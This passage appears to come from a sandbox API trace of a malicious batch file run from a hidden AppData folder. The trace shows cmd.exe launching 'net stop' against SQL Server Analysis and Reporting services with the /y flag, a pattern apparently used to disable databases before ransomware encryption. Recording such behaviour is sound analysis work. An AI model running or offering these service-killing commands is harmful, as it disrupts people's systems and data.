"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0196.558] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0196.558] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.558] SetFilePointer (in: hFile=0x74, lDistanceToMove=2398, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.558] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0196.558] GetProcessHeap () returned 0x3e0000 [0196.559] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0196.559] GetProcessHeap () returned 0x3e0000 [0196.559] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0196.559] GetProcessHeap () returned 0x3e0000 [0196.559] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0196.559] GetProcessHeap () returned 0x3e0000 [0196.559] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0196.559] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.559] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95e [0196.559] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xf63, lpOverlapped=0x0) returned 1 [0196.559] SetFilePointer (in: hFile=0x74, lDistanceToMove=2429, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x97d [0196.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSOLAP$SYSTEM_BGC /y\r\nITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 31 [0196.560] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.560] GetFileType (hFile=0x74) returned 0x1 [0196.560] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.560] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x97d [0196.560] GetProcessHeap () returned 0x3e0000 [0196.560] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0196.560] GetProcessHeap () returned 0x3e0000 [0196.560] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0196.563] _tell (_FileHandle=3) returned 2429 [0196.563] _close (_FileHandle=3) returned 0 [0196.563] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0196.563] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0196.563] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0196.563] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0196.563] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0196.563] _wcsicmp (_String1="net", _String2="CD") returned 11 [0196.563] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0196.563] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0196.563] _wcsicmp (_String1="net", _String2="REN") returned -4 [0196.564] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0196.564] _wcsicmp (_String1="net", _String2="SET") returned -5 [0196.564] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0196.564] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0196.564] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0196.564] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0196.564] _wcsicmp (_String1="net", _String2="MD") returned 1 [0196.564] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0196.564] _wcsicmp (_String1="net", _String2="RD") returned -4 [0196.564] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0196.564] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0196.564] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0196.564] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0196.564] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0196.564] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0196.564] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0196.564] _wcsicmp (_String1="net", _String2="VER") returned -8 [0196.564] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0196.564] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0196.564] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0196.564] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0196.564] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0196.564] _wcsicmp (_String1="net", _String2="START") returned -5 [0196.564] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0196.564] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0196.564] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0196.564] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0196.564] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0196.564] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0196.564] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0196.564] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0196.564] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0196.564] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0196.565] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0196.565] SetErrorMode (uMode=0x0) returned 0x1 [0196.565] GetProcessHeap () returned 0x3e0000 [0196.565] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0196.565] GetProcessHeap () returned 0x3e0000 [0196.565] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0196.566] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.566] GetProcessHeap () returned 0x3e0000 [0196.566] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0196.566] GetProcessHeap () returned 0x3e0000 [0196.566] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0196.566] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.566] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.567] GetLastError () returned 0x2 [0196.567] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.567] GetLastError () returned 0x2 [0196.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.568] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.568] GetLastError () returned 0x2 [0196.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.569] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.569] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.570] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0196.570] SetErrorMode (uMode=0x0) returned 0x1 [0196.570] GetProcessHeap () returned 0x3e0000 [0196.570] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0196.570] GetProcessHeap () returned 0x3e0000 [0196.570] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0196.571] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.571] GetProcessHeap () returned 0x3e0000 [0196.571] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0196.571] GetProcessHeap () returned 0x3e0000 [0196.571] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0196.571] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.571] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.572] GetLastError () returned 0x2 [0196.572] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.572] GetLastError () returned 0x2 [0196.572] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0196.573] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0196.573] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0196.573] GetLastError () returned 0x2 [0196.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0196.574] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0196.574] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.574] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0196.574] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0196.574] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0196.575] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.575] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSOLAP$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSOLAP$SYSTEM_BGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSOLAP$SYSTEM_BGC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x128, dwThreadId=0x924)) returned 1 [0196.578] CloseHandle (hObject=0x74) returned 1 [0196.578] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.578] GetProcessHeap () returned 0x3e0000 [0196.578] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.578] GetEnvironmentStringsW () returned 0x3f8408* [0196.578] GetProcessHeap () returned 0x3e0000 [0196.578] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.578] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.578] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0196.708] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0196.708] CloseHandle (hObject=0x78) returned 1 [0196.708] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0196.708] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0196.708] GetProcessHeap () returned 0x3e0000 [0196.708] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.708] GetEnvironmentStringsW () returned 0x3f8408* [0196.708] GetProcessHeap () returned 0x3e0000 [0196.708] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.708] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.708] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0196.708] GetProcessHeap () returned 0x3e0000 [0196.708] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.708] GetEnvironmentStringsW () returned 0x3f8408* [0196.708] GetProcessHeap () returned 0x3e0000 [0196.708] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.708] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.708] GetProcessHeap () returned 0x3e0000 [0196.708] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0196.709] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0196.709] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.709] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0196.709] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.709] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0196.709] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.709] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0196.709] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.709] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0196.709] SetConsoleInputExeNameW () returned 0x1 [0196.709] GetConsoleOutputCP () returned 0x1b5 [0196.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0196.710] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0196.710] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0196.710] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.710] SetFilePointer (in: hFile=0x78, lDistanceToMove=2429, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x97d [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0196.710] GetProcessHeap () returned 0x3e0000 [0196.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0196.711] GetProcessHeap () returned 0x3e0000 [0196.711] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0196.711] GetProcessHeap () returned 0x3e0000 [0196.711] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0196.711] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.711] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x97d [0196.711] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xf44, lpOverlapped=0x0) returned 1 [0196.711] SetFilePointer (in: hFile=0x78, lDistanceToMove=2459, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x99b [0196.711] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ReportServer$TPS /y\r\n\nITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 30 [0196.711] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.711] GetFileType (hFile=0x78) returned 0x1 [0196.711] _get_osfhandle (_FileHandle=3) returned 0x78 [0196.711] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x99b [0196.711] GetProcessHeap () returned 0x3e0000 [0196.711] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0196.712] GetProcessHeap () returned 0x3e0000 [0196.712] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0196.715] _tell (_FileHandle=3) returned 2459 [0196.715] _close (_FileHandle=3) returned 0 [0196.715] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0196.715] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0196.715] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0196.715] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0196.715] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0196.715] _wcsicmp (_String1="net", _String2="CD") returned 11 [0196.715] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0196.715] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0196.715] _wcsicmp (_String1="net", _String2="REN") returned -4 [0196.715] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0196.715] _wcsicmp (_String1="net", _String2="SET") returned -5 [0196.715] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0196.715] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0196.715] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0196.715] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0196.715] _wcsicmp (_String1="net", _String2="MD") returned 1 [0196.715] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0196.715] _wcsicmp (_String1="net", _String2="RD") returned -4 [0196.715] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0196.715] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0196.715] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0196.715] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0196.715] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0196.715] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0196.715] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0196.715] _wcsicmp (_String1="net", _String2="VER") returned -8 [0196.715] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0196.715] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0196.715] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0196.715] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0196.715] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0196.715] _wcsicmp (_String1="net", _String2="START") returned -5 [0196.716] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0196.716] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0196.716] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0196.716] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0196.716] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0196.716] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0196.716] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0196.716] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0196.716] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0196.716] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0196.716] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0196.716] SetErrorMode (uMode=0x0) returned 0x1 [0196.717] GetProcessHeap () returned 0x3e0000 [0196.717] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0196.717] GetProcessHeap () returned 0x3e0000 [0196.717] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0196.717] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.717] GetProcessHeap () returned 0x3e0000 [0196.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0196.717] GetProcessHeap () returned 0x3e0000 [0196.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0196.717] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.718] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.718] GetLastError () returned 0x2 [0196.718] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.718] GetLastError () returned 0x2 [0196.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.719] FindFirstFileExW (in: 